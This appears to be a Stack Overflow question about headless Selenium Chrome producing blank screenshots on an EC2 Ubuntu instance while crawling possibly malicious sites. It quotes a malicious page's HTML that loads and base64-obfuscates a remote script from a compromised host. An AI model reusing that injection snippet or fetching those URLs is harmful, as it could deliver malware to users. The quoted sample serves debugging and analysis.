
I am using the Python bindings for Selenium to load websites (they may be malicious, benign, or greyware) for a project I'm building.

While the majority of pages behave identically (whether they're SPAs or traditional HTML pages), at least a subset of them produce blank screenshots when I call get_screenshot_as_base64() with a Chrome driver on an Amazon EC2 t2.micro instance running Ubuntu Jammy (ubuntu-jammy-22.04-amd64-server-20220609, Chrome v. 112.0.5615.121, Chromedriver v. 112.0.5615.49):

Blank screenshot on Ubuntu EC2 instance

Testing locally on a Mac M1 (macOS Monterey, Chrome v. 112.0.5615.137, Chromedriver v. 112.0.5615.49) with the exact same code (provided below), however, does not produce a blank screenshot:

Non-blank screenshot on Mac M1

Code:

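import base64
import logging
import time

import config  # project module (assumed importable); provides SCREENSHOT_BYTES_BLANK
from web_driver_wrapper import WebDriverWrapper

logger = logging.getLogger(__name__)

def crawl_test(url, sshot_outfile="test.png"):
    screenshot = None
    max_tries = 10  # 10 tries x 0.5 s: retry for about 5 seconds
    with WebDriverWrapper() as driver_wrapper:
        driver = driver_wrapper.driver
        driver.get(url)
        try:
            screenshot = driver.get_screenshot_as_base64()
            tries = max_tries
            # Re-capture while the screenshot still ends with the known "blank" bytes
            while (screenshot
                   and screenshot.endswith(config.SCREENSHOT_BYTES_BLANK)
                   and tries > 0):
                logger.info(f"Trying to get non-empty screenshot, attempt #{max_tries - tries + 1}")
                time.sleep(0.5)
                screenshot = driver.get_screenshot_as_base64()  # try capturing again
                tries -= 1
        except Exception:
            # Handler omitted in my original snippet; logging here so the example is complete
            logger.exception("Failed to capture screenshot")
    if screenshot:
        with open(sshot_outfile, 'wb') as f:
            f.write(base64.b64decode(screenshot))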

The WebDriverWrapper() call mentioned above essentially looks like the following:

    chrome_options.add_argument("--headless")
    chrome_options.add_argument("--no-sandbox")
    chrome_options.add_argument("--disable-dev-shm-usage")
    chrome_options.add_argument("--disable-gpu")
    chrome_options.add_argument("--disable-dev-tools")
    chrome_options.add_argument("--no-zygote")
    chrome_options.add_argument("--single-process")
    chrome_options.add_argument("--window-size=1080,768")  # Chrome expects --window-size=WIDTH,HEIGHT
    chrome_options.add_argument("--remote-debugging-port=9222")
    input_driver = webdriver.Chrome(chromedriver_location, options=chrome_options)
    return input_driver

The chromedriver_location variable is passed in based on whichever OS I'm using and works fine.

While I haven't evaluated all of the cases, in at least one of them the difference occurs because the Ubuntu instance does not seem to evaluate the script in the <head> tag, whereas the Mac does. The page source is as follows (note that the HTML below is from a malicious website, so please do not run it unless you know what you're doing!):

<html><head><script src="https://fmplay.com.br/fm/wp-content/cache/host%5bv17%5d/admin/js/fr.js"></script></head><body><input id="b64u" type="hidden" value="aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUvaG9zdCU1YnYxNyU1ZC8zNDhmMjE5LnBocA=="/><script>const per = document.createElement("script");per.src=atob("aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUvaG9zdCU1YnYxNyU1ZC9hZG1pbi9qcy9mci5qcw==");document.head.appendChild(per);</script></body></html>
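As a side note, the two base64 strings in that page can be decoded offline (no request is made) to see what the inline script does. This is only a minimal sketch; the constant and function names are mine, chosen for illustration, and the values are copied from the HTML above:

```python
import base64

# Values copied verbatim from the page source above. Nothing is fetched here.
HEAD_SCRIPT_SRC = "https://fmplay.com.br/fm/wp-content/cache/host%5bv17%5d/admin/js/fr.js"
INLINE_SCRIPT_B64 = (
    "aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUvaG9zdCU1YnYxNyU1ZC9hZG1pbi9qcy9mci5qcw=="
)
HIDDEN_INPUT_B64 = (
    "aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUvaG9zdCU1YnYxNyU1ZC8zNDhmMjE5LnBocA=="
)


def decode(value: str) -> str:
    """Decode a base64 string the same way the page's atob() call would."""
    return base64.b64decode(value).decode("ascii")


injected_src = decode(INLINE_SCRIPT_B64)  # what the inline <script> appends to <head>
hidden_target = decode(HIDDEN_INPUT_B64)  # value of the hidden "b64u" input

print("inline script injects the same file as <head>:", injected_src == HEAD_SCRIPT_SRC)
print("hidden input points to:", hidden_target)
```

If the comparison holds, the inline script only re-injects the same fr.js that the <head> already references, so everything the page renders appears to depend on that single remote script loading and running.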

On the MacBook, it takes about 2 iterations of the loop for the script to be evaluated and send me to the final page. On the EC2 instance, however, the page never changes. I've tried looping for up to ~50 seconds on EC2 with no change, in case it was a resource issue.

In addition, I have tried the following, each of which elicited no change to the behavior on the Ubuntu instance:

  1. a few different versions of Chrome/Chromedriver
  2. the Service-based setup referenced here
  3. using xvfb-run as described here
  4. using the Remote class of Selenium's webdriver as described at the end of this article

At this point, I've exhausted all of my expertise and Googling, and I'm hoping some fantastic person out there has run into and overcome this issue. Thanks in advance for any of your time!

  • I haven't been able to confirm it 100%, but in at least 2 cases (the above being one case) this is due to the EC2 instance receiving a 403 (Forbidden) when the local Macbook receives a 200 OK. So hopefully the issue is that I'm being IP blocked and not actually an issue with the driver. – another_user Apr 24 '23 at 16:45
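One way to check the 403 hypothesis from the comment above might be to read Chrome's performance log through Selenium and list every response with an error status. The helper below is a sketch under assumptions, not a confirmed fix: failed_responses is a hypothetical name, and it assumes performance logging was enabled on the options before the driver was created.

```python
import json


def failed_responses(perf_log_entries):
    """Return (status, resource_type, url) for each response with status >= 400.

    perf_log_entries is expected to be the list returned by
    driver.get_log("performance"); each entry carries a JSON string under
    the "message" key that wraps one DevTools event.
    """
    failures = []
    for entry in perf_log_entries:
        event = json.loads(entry["message"])["message"]
        if event.get("method") != "Network.responseReceived":
            continue
        params = event.get("params", {})
        response = params.get("response", {})
        status = response.get("status")
        if status is not None and status >= 400:
            failures.append((status, params.get("type"), response.get("url")))
    return failures


# Assumed wiring inside the existing setup (not executed here):
#   chrome_options.set_capability("goog:loggingPrefs", {"performance": "ALL"})
#   ...
#   driver.get(url)
#   for status, rtype, rurl in failed_responses(driver.get_log("performance")):
#       logger.info(f"{status} for {rtype} {rurl}")
```

Running this on both machines and comparing the output should show whether the EC2 instance gets a 403 for the page or for its script while the MacBook gets a 200, which would point to IP-based blocking rather than a driver problem.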
